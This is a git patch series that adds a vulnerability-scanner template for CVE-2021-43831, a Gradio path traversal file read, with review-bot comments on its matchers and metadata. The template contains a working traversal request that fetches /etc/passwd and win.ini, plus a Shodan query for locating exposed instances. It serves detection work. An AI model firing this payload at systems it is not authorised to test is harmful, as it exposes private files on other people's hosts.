From 7c5a294b9b89e224bdae03639c163d7f1a019e37 Mon Sep 17 00:00:00 2001
From: isacaya <114328108+isacaya@users.noreply.github.com>
Date: Sat, 15 Jun 2024 21:43:59 +0900
Subject: [PATCH 1/4] Create CVE-2021-43831.yaml
---
http/cves/2021/CVE-2021-43831.yaml | 52 ++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 http/cves/2021/CVE-2021-43831.yaml
diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml
new file mode 100644
index 0000000000..85711779f2
--- /dev/null
+++ b/http/cves/2021/CVE-2021-43831.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-43831
+
+info:
+ name: Arbitrary File Read in Gradio
+ author: isacaya
+ severity: high
+ description: |
+ Files on the host computer can be accessed from the Gradio interface
+ impact: |
+ An attacker would be able to view the contents of a file on the computer.
+ remediation: |
+ Update to version 2.5.0.
+ reference:
+ - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
+ - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
+ classification:
+ cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+ cvss-score: 8.3
+ cve-id: CVE-2021-43831
+ cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
+ metadata:
+ vendor: Gradio
+ product: Gradio
+ shodan-query: title:"Gradio"
+ tags: cve,cve2021,lfi,Gradio,traversal
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
+
+ payloads:
+ path:
+ - /etc/passwd
+ - /windows/win.ini
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body)"
+ - "status_code == 200"
+ condition: and
+
+ - type: dsl
+ dsl:
+ - "contains(body, 'bit app support')"
+ - "contains(body, 'fonts')"
+ - "contains(body, 'extensions')"
+ - "status_code == 200"
+ condition: and
\ No newline at end of file
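Review bot: The `info` block under-documents the finding. `description` does not say which Gradio versions are affected or that the read happens through path traversal on the `/file/` route, and `remediation` names only the single version 2.5.0. I would write the remediation as `Update Gradio to version 2.5.0 or later.` and the description along the lines of `Gradio before 2.5.0 does not restrict paths requested through the /file/ route, so files readable by the Gradio process can be retrieved.` The `reference` list would also benefit from the NVD entry for CVE-2021-43831 next to the advisory and fix commit, so a triager can confirm score and CPE in one place.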
From f35d7dccc83c24ae898d91bd1d3a20bb1e471714 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 16 Jun 2024 05:52:46 +0530 Subject: [PATCH 2/4] minor update --- http/cves/2021/CVE-2021-43831.yaml | 36 +++++++++++++++--------------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 85711779f2..d231cceb03 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -14,15 +14,19 @@ info: - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L - cvss-score: 8.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 cve-id: CVE-2021-43831 + cwe-id: CWE-22 + epss-score: 0.00063 + epss-percentile: 0.26511 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: - vendor: Gradio - product: Gradio + vendor: gradio_project + product: gradio + framework: python shodan-query: title:"Gradio" - tags: cve,cve2021,lfi,Gradio,traversal + tags: cve,cve2021,lfi,gradio http: - method: GET @@ -35,18 +39,14 @@ http: - /windows/win.ini stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and \ No newline at end of file + - type: status + status: + - 200 From d4672990c24e86983e145512117868720c6616dd Mon Sep 17 00:00:00 2001 
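Review bot: The rewritten body matcher in the second hunk is looser on the Windows side than the one it replaces. With `condition: or`, a single `[fonts]`, `[extensions]` or `[files]` header anywhere in a 200 response now counts as a hit, whereas the earlier DSL matcher required `bit app support`, `fonts` and `extensions` together. Any application that returns INI-style text at that path would then be reported as a high-severity file read. I would replace the second pattern with the win.ini comment string the first revision relied on, `- "bit app support"`, and state `part: body` on the regex matcher so the matched part is explicit. Separately, the `epss-score` and `epss-percentile` values added in the first hunk are point-in-time figures and will go stale unless tooling regenerates them.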
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:56:15 +0530 Subject: [PATCH 3/4] Update CVE-2021-43831.yaml --- http/cves/2021/CVE-2021-43831.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index d231cceb03..6499d743b8 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43831 info: - name: Arbitrary File Read in Gradio + name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: | @@ -39,6 +39,7 @@ http: - /windows/win.ini stop-at-first-match: true + matchers-condition: and matchers: - type: regex From 0d6a44c3cb8e3e062de310b82e5138eec5685aed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:59:19 +0530 Subject: [PATCH 4/4] lint fix --- http/cves/2021/CVE-2021-43831.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 6499d743b8..41bdceadc2 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43831 info: - name: Gradio < 2.5.0 - Arbitrary File Read + name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: |